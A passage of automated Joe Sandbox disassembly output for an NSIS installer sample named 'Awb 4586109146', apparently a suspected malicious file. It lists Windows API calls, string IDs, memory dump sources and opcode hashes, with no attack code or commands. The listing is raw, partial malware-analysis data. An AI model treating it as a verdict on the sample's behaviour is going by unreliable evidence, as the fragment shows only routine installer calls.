                                                                    • GetSysColor.USER32(00000000), ref: 004042F3
                                                                    • SetTextColor.GDI32(?,00000000), ref: 004042FF
                                                                    • SetBkMode.GDI32(?,?), ref: 0040430B
                                                                    • GetSysColor.USER32(?), ref: 0040431E
                                                                    • SetBkColor.GDI32(?,?), ref: 0040432E
                                                                    • DeleteObject.GDI32(?), ref: 00404348
                                                                    • CreateBrushIndirect.GDI32(?), ref: 00404352
                                                                    Memory Dump Source
                                                                    • Source File: 00000006.00000002.3880866593.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000006.00000002.3880848042.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000006.00000002.3880887307.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000006.00000002.3880906838.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000006.00000002.3880934724.0000000000473000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_6_2_400000_Awb 4586109146.jbxd
                                                                    Similarity
                                                                    • API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
                                                                    • String ID:
                                                                    • API String ID: 2320649405-0
                                                                    • Opcode ID: cedac81959eb3ef19a74f908d68e4e703a61b794166ebd5b231b869c6a402091
                                                                    • Instruction ID: a3c6a1d12b74a4a342abaca89036a15a37f51972f1e3113ed1cbee018e9c0b42
                                                                    • Opcode Fuzzy Hash: cedac81959eb3ef19a74f908d68e4e703a61b794166ebd5b231b869c6a402091
                                                                    • Instruction Fuzzy Hash: 772156716007059BC724DF78D948B5B77F4AF81710B04893DED96A26E0D734E544CB54
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000006.00000002.3880866593.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000006.00000002.3880848042.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000006.00000002.3880887307.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000006.00000002.3880906838.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000006.00000002.3880934724.0000000000473000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_6_2_400000_Awb 4586109146.jbxd
                                                                    Similarity
                                                                    • API ID: CountTick$wsprintf
                                                                    • String ID: ... %d%%$@
                                                                    • API String ID: 551687249-3859443358
                                                                    • Opcode ID: 332a35644ce53e0492720e78fed1094326ce68f61c68911b2c6b8c231937ce50
                                                                    • Instruction ID: 5c504835c6c52170eea8577a9cac8da2a2598cbf1b76cdbdeb728d3f56fa2377
                                                                    • Opcode Fuzzy Hash: 332a35644ce53e0492720e78fed1094326ce68f61c68911b2c6b8c231937ce50
                                                                    • Instruction Fuzzy Hash: AA517A71900219DBCB10DFA5DA84A9E7BB8AF04366F14417BEC14B72C0CB78DA40CBA9
                                                                    APIs
                                                                    • ReadFile.KERNEL32(?,?,?,?), ref: 004026B6
                                                                    • MultiByteToWideChar.KERNEL32(?,00000008,?,?,?,?), ref: 004026F1
                                                                    • SetFilePointer.KERNEL32(?,?,?,?,?,00000008,?,?,?,?), ref: 00402714
                                                                    • MultiByteToWideChar.KERNEL32(?,00000008,?,00000000,?,?,?,?,?,00000008,?,?,?,?), ref: 0040272A
                                                                      • Part of subcall function 00405E91: SetFilePointer.KERNEL32(?,00000000,00000000,?), ref: 00405EA7
                                                                    • SetFilePointer.KERNEL32(?,?,?,?,?,?,00000002), ref: 004027D6
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000006.00000002.3880866593.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000006.00000002.3880848042.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000006.00000002.3880887307.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000006.00000002.3880906838.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000006.00000002.3880934724.0000000000473000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_6_2_400000_Awb 4586109146.jbxd
                                                                    Similarity
                                                                    • API ID: File$Pointer$ByteCharMultiWide$Read
                                                                    • String ID: 9
                                                                    • API String ID: 163830602-2366072709
                                                                    • Opcode ID: 19438e2e62ba8aece1a895eee3c3762f252ce0cb36923fbe756b3879527f42a2
                                                                    • Instruction ID: 0a1b8613d15e357d59cabb4a84863d73d9dad353ca9b6e0785da3ca47288b3a0
                                                                    • Opcode Fuzzy Hash: 19438e2e62ba8aece1a895eee3c3762f252ce0cb36923fbe756b3879527f42a2
                                                                    • Instruction Fuzzy Hash: 42511974D00219AEDF219F95DA88AAEB779FF04304F10443BE901B72D0DBB89982CB18
                                                                    APIs
                                                                    • lstrlenW.KERNEL32(0042C228,00000000,?,755723A0,?,?,?,?,?,?,?,?,?,0040327A,00000000,?), ref: 0040535A
                                                                    • lstrlenW.KERNEL32(0040327A,0042C228,00000000,?,755723A0,?,?,?,?,?,?,?,?,?,0040327A,00000000), ref: 0040536A
                                                                    • lstrcatW.KERNEL32(0042C228,0040327A,0040327A,0042C228,00000000,?,755723A0), ref: 0040537D
                                                                    • SetWindowTextW.USER32(0042C228,0042C228), ref: 0040538F
                                                                    • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 004053B5
                                                                    • SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 004053CF
                                                                    • SendMessageW.USER32(?,00001013,?,00000000), ref: 004053DD
                                                                    Memory Dump Source
                                                                    • Source File: 00000006.00000002.3880866593.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000006.00000002.3880848042.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000006.00000002.3880887307.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000006.00000002.3880906838.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000006.00000002.3880934724.0000000000473000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_6_2_400000_Awb 4586109146.jbxd
                                                                    Similarity
                                                                    • API ID: MessageSend$lstrlen$TextWindowlstrcat
                                                                    • String ID:
                                                                    • API String ID: 2531174081-0
                                                                    • Opcode ID: 165d7cb729b0b1d8dbd40609dc1f72fd4c041b11e62b4558e2d47e9179cb1f78
                                                                    • Instruction ID: 851cb2e595d07e8670ef4c489cf40fd5108cb81fe88e509cf6dd9e4b353e565e
                                                                    • Opcode Fuzzy Hash: 165d7cb729b0b1d8dbd40609dc1f72fd4c041b11e62b4558e2d47e9179cb1f78
                                                                    • Instruction Fuzzy Hash: 20218371900518BACF11AFA5DD859CFBFB9EF45350F14807AF904B62A0C7B94A40DFA8
                                                                    APIs
                                                                    • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00404C07
                                                                    • GetMessagePos.USER32 ref: 00404C0F
                                                                    • ScreenToClient.USER32(?,?), ref: 00404C29
                                                                    • SendMessageW.USER32(?,00001111,00000000,?), ref: 00404C3B
                                                                    • SendMessageW.USER32(?,0000113E,00000000,?), ref: 00404C61
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000006.00000002.3880866593.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000006.00000002.3880848042.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000006.00000002.3880887307.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000006.00000002.3880906838.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000006.00000002.3880934724.0000000000473000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_6_2_400000_Awb 4586109146.jbxd
                                                                    Similarity
                                                                    • API ID: Message$Send$ClientScreen
                                                                    • String ID: f
                                                                    • API String ID: 41195575-1993550816
                                                                    • Opcode ID: e2d2d6aa42d138b4bf43a857dc2fb8cfa63f2fbdf5f441295addbf44c9bf4daa
                                                                    • Instruction ID: 457ccdd811883e010b73e4973708530e0d9e00004b69c5e73a61d7a3cd07de8f
                                                                    • Opcode Fuzzy Hash: e2d2d6aa42d138b4bf43a857dc2fb8cfa63f2fbdf5f441295addbf44c9bf4daa
                                                                    • Instruction Fuzzy Hash: CF015271900218BAEB10DBA4DD85BFEBBBCAF95711F10412BBA50B71D0D7B499018BA4
                                                                    APIs
                                                                    • SetTimer.USER32(?,?,000000FA,00000000), ref: 00402E11
                                                                    • MulDiv.KERNEL32(?,00000064,?), ref: 00402E3C
                                                                    • wsprintfW.USER32 ref: 00402E4C
                                                                    • SetWindowTextW.USER32(?,?), ref: 00402E5C
                                                                    • SetDlgItemTextW.USER32(?,00000406,?), ref: 00402E6E
                                                                    Strings
                                                                    • verifying installer: %d%%, xrefs: 00402E46
                                                                    Memory Dump Source
                                                                    • Source File: 00000006.00000002.3880866593.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000006.00000002.3880848042.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000006.00000002.3880887307.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000006.00000002.3880906838.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000006.00000002.3880934724.0000000000473000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_6_2_400000_Awb 4586109146.jbxd
                                                                    Similarity
                                                                    • API ID: Text$ItemTimerWindowwsprintf
                                                                    • String ID: verifying installer: %d%%
                                                                    • API String ID: 1451636040-82062127
                                                                    • Opcode ID: e1d542de2cd716b5e5aca43617af61348071ba80885408b45aa8db9304e84829
                                                                    • Instruction ID: 97abdd23f95b89fa957f28f44bfdcbbe1494948371ff671501e6f707f2390605
                                                                    • Opcode Fuzzy Hash: e1d542de2cd716b5e5aca43617af61348071ba80885408b45aa8db9304e84829
                                                                    • Instruction Fuzzy Hash: B7014F7164020CBBEF209F60DE49FAA3B69AB04304F008439FA06B91E0DBB885558B98
                                                                    APIs
                                                                    • GetSystemDirectoryW.KERNEL32(?,00000104), ref: 0040663B
                                                                    • wsprintfW.USER32 ref: 00406676
                                                                    • LoadLibraryExW.KERNEL32(?,00000000,00000008), ref: 0040668A
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000006.00000002.3880866593.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000006.00000002.3880848042.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000006.00000002.3880887307.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000006.00000002.3880906838.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000006.00000002.3880934724.0000000000473000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_6_2_400000_Awb 4586109146.jbxd
                                                                    Similarity
                                                                    • API ID: DirectoryLibraryLoadSystemwsprintf
                                                                    • String ID: %s%S.dll$UXTHEME$\
                                                                    • API String ID: 2200240437-1946221925
                                                                    • Opcode ID: fcd04411c5a1f64f7e9219edfc5ac0d332aa1f587fd7b062781a7321f30925af
                                                                    • Instruction ID: 9fa172bba6ca99a644905d2b6d7ed641771312ed853c50fe9922007c80c3d461
                                                                    • Opcode Fuzzy Hash: fcd04411c5a1f64f7e9219edfc5ac0d332aa1f587fd7b062781a7321f30925af
                                                                    • Instruction Fuzzy Hash: 7CF0FC70501119A6CF10BB64DD0EF9B365CA700304F10447AA54AF10D1EBB9DB64CB99
                                                                    APIs
                                                                    • GlobalAlloc.KERNEL32(00000040,?,00000000,40000000,00000002,00000000,00000000), ref: 00402901
                                                                    • GlobalAlloc.KERNEL32(00000040,?,00000000,?), ref: 0040291D
                                                                    • GlobalFree.KERNEL32(?), ref: 00402956
                                                                    • GlobalFree.KERNEL32(00000000), ref: 00402969
                                                                    • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,000000F0), ref: 00402981
                                                                    • DeleteFileW.KERNEL32(?,00000000,40000000,00000002,00000000,00000000), ref: 00402995
                                                                    Memory Dump Source
                                                                    • Source File: 00000006.00000002.3880866593.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000006.00000002.3880848042.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000006.00000002.3880887307.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000006.00000002.3880906838.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000006.00000002.3880934724.0000000000473000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_6_2_400000_Awb 4586109146.jbxd
                                                                    Similarity
                                                                    • API ID: Global$AllocFree$CloseDeleteFileHandle
                                                                    • String ID:
                                                                    • API String ID: 2667972263-0
                                                                    • Opcode ID: b3fdf1977b6322b79f2de70fe62da7d4d8df1abbe89a1d301570377ab221975a
                                                                    • Instruction ID: 46c72067781f24dbae578634f425dbba750e376c3d5c902d6f733973cd64d3bf
                                                                    • Opcode Fuzzy Hash: b3fdf1977b6322b79f2de70fe62da7d4d8df1abbe89a1d301570377ab221975a
                                                                    • Instruction Fuzzy Hash: 9621AEB1800128BBDF116FA5DE89DDE7E79AF08364F14423AF960762E0CB794C418B98
                                                                    APIs
                                                                    • CharNextW.USER32(?,*?|<>/":,00000000,00000000,00441800,00441800,0043F000,0040336A,00441800,75573420,004035D9,?,00000006,00000008,0000000A), ref: 004065B1
                                                                    • CharNextW.USER32(?,?,?,00000000,?,00000006,00000008,0000000A), ref: 004065C0
                                                                    • CharNextW.USER32(?,00000000,00441800,00441800,0043F000,0040336A,00441800,75573420,004035D9,?,00000006,00000008,0000000A), ref: 004065C5
                                                                    • CharPrevW.USER32(?,?,00441800,00441800,0043F000,0040336A,00441800,75573420,004035D9,?,00000006,00000008,0000000A), ref: 004065D8
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000006.00000002.3880866593.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000006.00000002.3880848042.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000006.00000002.3880887307.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000006.00000002.3880906838.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000006.00000002.3880934724.0000000000473000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_6_2_400000_Awb 4586109146.jbxd
                                                                    Similarity
                                                                    • API ID: Char$Next$Prev
                                                                    • String ID: *?|<>/":
                                                                    • API String ID: 589700163-165019052
                                                                    • Opcode ID: f2dbc7d310367101a7bf5127f564121aa95c210a65fb008c6410ea5a4ac792ac
                                                                    • Instruction ID: 36fae6fd7d65e337959ab81909abbfc549fe516cf0b4c9ff473ab524d2c4c229
                                                                    • Opcode Fuzzy Hash: f2dbc7d310367101a7bf5127f564121aa95c210a65fb008c6410ea5a4ac792ac
                                                                    • Instruction Fuzzy Hash: B611B65580061279DB302B14BC40EB762F8EF54764F56403FED86732C8EBBC5C9292AD
                                                                    APIs
                                                                    • lstrcatW.KERNEL32(00000000,00000000,0040A5D0,00440000,?,?,00000031), ref: 004017B0
                                                                    • CompareFileTime.KERNEL32(-00000014,?,0040A5D0,0040A5D0,00000000,00000000,0040A5D0,00440000,?,?,00000031), ref: 004017D5
                                                                      • Part of subcall function 004062BA: lstrcpynW.KERNEL32(?,?,00000400,00403460,00433EE0,NSIS Error,?,00000006,00000008,0000000A), ref: 004062C7
                                                                      • Part of subcall function 00405322: lstrlenW.KERNEL32(0042C228,00000000,?,755723A0,?,?,?,?,?,?,?,?,?,0040327A,00000000,?), ref: 0040535A
                                                                      • Part of subcall function 00405322: lstrlenW.KERNEL32(0040327A,0042C228,00000000,?,755723A0,?,?,?,?,?,?,?,?,?,0040327A,00000000), ref: 0040536A
                                                                      • Part of subcall function 00405322: lstrcatW.KERNEL32(0042C228,0040327A,0040327A,0042C228,00000000,?,755723A0), ref: 0040537D
                                                                      • Part of subcall function 00405322: SetWindowTextW.USER32(0042C228,0042C228), ref: 0040538F
                                                                      • Part of subcall function 00405322: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 004053B5
                                                                      • Part of subcall function 00405322: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 004053CF
                                                                      • Part of subcall function 00405322: SendMessageW.USER32(?,00001013,?,00000000), ref: 004053DD
                                                                    Memory Dump Source
                                                                    • Source File: 00000006.00000002.3880866593.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000006.00000002.3880848042.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000006.00000002.3880887307.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000006.00000002.3880906838.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000006.00000002.3880934724.0000000000473000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_6_2_400000_Awb 4586109146.jbxd
                                                                    Similarity
                                                                    • API ID: MessageSend$lstrcatlstrlen$CompareFileTextTimeWindowlstrcpyn
                                                                    • String ID:
                                                                    • API String ID: 1941528284-0
                                                                    • Opcode ID: 6e9a8046af19eb094d6abfdf57eef79a3d41af2fa463d12146f877a34a213090
                                                                    • Instruction ID: 24a82d921ca393d09b0f70664e9a68f54f64900ed4cc6ef124b6c19d11fe7a64
                                                                    • Opcode Fuzzy Hash: 6e9a8046af19eb094d6abfdf57eef79a3d41af2fa463d12146f877a34a213090
                                                                    • Instruction Fuzzy Hash: 12419371900518BACF107BA5DD46DAF3A79EF45368F20423FF422B10E1DA3C8A519A6D
                                                                    APIs
                                                                    • GetDC.USER32(?), ref: 00401DBC
                                                                    • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00401DD6
                                                                    • MulDiv.KERNEL32(00000000,00000000), ref: 00401DDE
                                                                    • ReleaseDC.USER32(?,00000000), ref: 00401DEF
                                                                    • CreateFontIndirectW.GDI32(0040CDD0), ref: 00401E3E
                                                                    Memory Dump Source
                                                                    • Source File: 00000006.00000002.3880866593.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000006.00000002.3880848042.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000006.00000002.3880887307.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000006.00000002.3880906838.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000006.00000002.3880934724.0000000000473000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_6_2_400000_Awb 4586109146.jbxd
                                                                    Similarity
                                                                    • API ID: CapsCreateDeviceFontIndirectRelease
                                                                    • String ID:
                                                                    • API String ID: 3808545654-0
                                                                    • Opcode ID: 0df72e3b5cf70d21c530e24e682e28afae01b7faaf581061804cefe84a28b9e7
                                                                    • Instruction ID: ba082d56d8bf6e999078db2812661e05c0675f9cd89887cb5e118dc0f9610a58
                                                                    • Opcode Fuzzy Hash: 0df72e3b5cf70d21c530e24e682e28afae01b7faaf581061804cefe84a28b9e7
                                                                    • Instruction Fuzzy Hash: CF015E71944240EFE700ABB0AF4AAD97FB4AF55301F10457EE242F61E2DAB904458B2D
                                                                    APIs
                                                                    • GetDlgItem.USER32(?,?), ref: 00401D63
                                                                    • GetClientRect.USER32(00000000,?), ref: 00401D70
                                                                    • LoadImageW.USER32(?,00000000,?,?,?,?), ref: 00401D91
                                                                    • SendMessageW.USER32(00000000,00000172,?,00000000), ref: 00401D9F
                                                                    • DeleteObject.GDI32(00000000), ref: 00401DAE
                                                                    Memory Dump Source
                                                                    • Source File: 00000006.00000002.3880866593.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000006.00000002.3880848042.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000006.00000002.3880887307.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000006.00000002.3880906838.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000006.00000002.3880934724.0000000000473000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_6_2_400000_Awb 4586109146.jbxd
                                                                    Similarity
                                                                    • API ID: ClientDeleteImageItemLoadMessageObjectRectSend
                                                                    • String ID:
                                                                    • API String ID: 1849352358-0
                                                                    • Opcode ID: ffa308e51fc2a7dd0918d2a0305ef53ba2975e26ebd74a39f79ceeac246a8f65
                                                                    • Instruction ID: f6b005b132729ba5a1909f4a704d5e159ac18246d791616e3be01574202a0a4f
                                                                    • Opcode Fuzzy Hash: ffa308e51fc2a7dd0918d2a0305ef53ba2975e26ebd74a39f79ceeac246a8f65
                                                                    • Instruction Fuzzy Hash: 4EF0FF72A04518AFDB01DBE4DF88CEEB7BCEB48301B14047AF641F61A0CA749D419B38
                                                                    APIs
                                                                    • SendMessageTimeoutW.USER32(00000000,00000000,?,?,?,00000002,?), ref: 00401C8F
                                                                    • SendMessageW.USER32(00000000,00000000,?,?), ref: 00401CA7
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000006.00000002.3880866593.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000006.00000002.3880848042.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000006.00000002.3880887307.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000006.00000002.3880906838.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000006.00000002.3880934724.0000000000473000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_6_2_400000_Awb 4586109146.jbxd
                                                                    Similarity
                                                                    • API ID: MessageSend$Timeout
                                                                    • String ID: !
                                                                    • API String ID: 1777923405-2657877971
                                                                    • Opcode ID: 7e3eeff1b63bcc2d517f183bf836ef2b026841584b0bf51ee9d38dd24623c36e
                                                                    • Instruction ID: 9b2162bbfebbb1b7b3748198b6c02d748cac4cdb6124cb19748b2f92d1b33cd7
                                                                    • Opcode Fuzzy Hash: 7e3eeff1b63bcc2d517f183bf836ef2b026841584b0bf51ee9d38dd24623c36e
                                                                    • Instruction Fuzzy Hash: 8E219371948209AEEF059FB5DE4AABE7BB5EF84304F14443EF605B61D0D7B889409B18
                                                                    APIs
                                                                    • lstrlenW.KERNEL32(0042D248,0042D248,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,?,000000DF,00000000,00000400,?), ref: 00404B7F
                                                                    • wsprintfW.USER32 ref: 00404B88
                                                                    • SetDlgItemTextW.USER32(?,0042D248), ref: 00404B9B
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000006.00000002.3880866593.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000006.00000002.3880848042.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000006.00000002.3880887307.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000006.00000002.3880906838.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000006.00000002.3880934724.0000000000473000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_6_2_400000_Awb 4586109146.jbxd
                                                                    Similarity
                                                                    • API ID: ItemTextlstrlenwsprintf
                                                                    • String ID: %u.%u%s%s
                                                                    • API String ID: 3540041739-3551169577
                                                                    • Opcode ID: be899ce802f4ada5aa38b77195d66e19eeaafb4e1a6305ece11e6f52dcfdaeb3
                                                                    • Instruction ID: 49dacc2217062e77d4dc452dcd456e10a33323318ced1260d8f84a7edb165714
                                                                    • Opcode Fuzzy Hash: be899ce802f4ada5aa38b77195d66e19eeaafb4e1a6305ece11e6f52dcfdaeb3
                                                                    • Instruction Fuzzy Hash: D911C3736041283ADB00656D9C46F9E369C9B85334F254237FA25F21D1E979D82182E8
                                                                    APIs
                                                                    • RegEnumKeyW.ADVAPI32(?,00000000,?,00000105), ref: 00402DA9
                                                                    • RegCloseKey.ADVAPI32(?,?,?), ref: 00402DB2
                                                                    • RegCloseKey.ADVAPI32(?,?,?), ref: 00402DD3
                                                                    Memory Dump Source
                                                                    • Source File: 00000006.00000002.3880866593.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000006.00000002.3880848042.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000006.00000002.3880887307.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000006.00000002.3880906838.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000006.00000002.3880934724.0000000000473000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_6_2_400000_Awb 4586109146.jbxd
                                                                    Similarity
                                                                    • API ID: Close$Enum
                                                                    • String ID:
                                                                    • API String ID: 464197530-0
                                                                    • Opcode ID: a4e23b119c2c64eb18a4fa0724f9b8d9fe0ec592ff9815e45bdb7592abe1cef3
                                                                    • Instruction ID: fc7ade2e12cd9e993d25f9a328d8db16c9603ee1eb20de8c24b8f84b94a82c23
                                                                    • Opcode Fuzzy Hash: a4e23b119c2c64eb18a4fa0724f9b8d9fe0ec592ff9815e45bdb7592abe1cef3
                                                                    • Instruction Fuzzy Hash: B4116A32500109FBDF02AB90CE09FEE7B7DAF54340F100076B904B51E1E7B59E21AB68
                                                                    APIs
                                                                    • CreateDirectoryW.KERNEL32(?,?,00000000), ref: 00405834
                                                                    • GetLastError.KERNEL32 ref: 00405848
                                                                    • SetFileSecurityW.ADVAPI32(?,80000007,00000001), ref: 0040585D
                                                                    • GetLastError.KERNEL32 ref: 00405867
                                                                    Memory Dump Source
                                                                    • Source File: 00000006.00000002.3880866593.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000006.00000002.3880848042.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000006.00000002.3880887307.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000006.00000002.3880906838.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000006.00000002.3880934724.0000000000473000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_6_2_400000_Awb 4586109146.jbxd
                                                                    Similarity
                                                                    • API ID: ErrorLast$CreateDirectoryFileSecurity
                                                                    • String ID:
                                                                    • API String ID: 3449924974-0
                                                                    • Opcode ID: 817c7eeb2e6ade2cce28f3b9d2e4670c9c7091e2f59c9eba6f9578a5288f1365
                                                                    • Instruction ID: d156970015101e62572267df52bf1fb018b172c5ebb67f048bc3511340661aba
                                                                    • Opcode Fuzzy Hash: 817c7eeb2e6ade2cce28f3b9d2e4670c9c7091e2f59c9eba6f9578a5288f1365
                                                                    • Instruction Fuzzy Hash: EB010872D00219EADF009FA1C944BEFBBB8EF14304F00803AE945B6280D7789618CFA9
                                                                    APIs
                                                                    • DestroyWindow.USER32(?,00000000,00403059,?,?,00000006,00000008,0000000A), ref: 00402E8C
                                                                    • GetTickCount.KERNEL32 ref: 00402EAA
                                                                    • CreateDialogParamW.USER32(0000006F,00000000,00402DF3,00000000), ref: 00402EC7
                                                                    • ShowWindow.USER32(00000000,00000005,?,00000006,00000008,0000000A), ref: 00402ED5
                                                                    Memory Dump Source
                                                                    • Source File: 00000006.00000002.3880866593.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000006.00000002.3880848042.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
